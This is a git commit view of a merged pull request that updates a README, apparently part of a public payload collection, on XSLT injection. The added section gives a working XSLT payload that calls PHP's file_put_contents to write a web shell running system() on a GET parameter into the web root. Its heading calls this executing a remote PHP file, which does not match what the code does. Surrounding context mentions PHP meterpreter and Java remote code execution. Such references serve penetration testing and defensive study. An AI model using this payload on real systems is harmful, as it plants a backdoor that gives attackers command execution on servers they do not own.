Merge pull request #690 from idealphase/master

Update README.md (XSLT Injection)
This commit is contained in:
Swissky 2023-10-28 17:34:14 +02:00 committed by GitHub
commit 85871c6c14
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23

View File

@ -161,6 +161,16 @@ Execute a PHP meterpreter using PHP wrapper.
</xsl:stylesheet> </xsl:stylesheet>
``` ```
Execute a remote php file using `file_put_contents`
```xml
<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:php="http://php.net/xsl" version="1.0">
<xsl:template match="/">
<xsl:value-of select="php:function('file_put_contents','/var/www/webshell.php','&lt;?php echo system($_GET[&quot;command&quot;]); ?&gt;')" />
</xsl:template>
</xsl:stylesheet>
```
### Remote Code Execution with Java ### Remote Code Execution with Java
```xml ```xml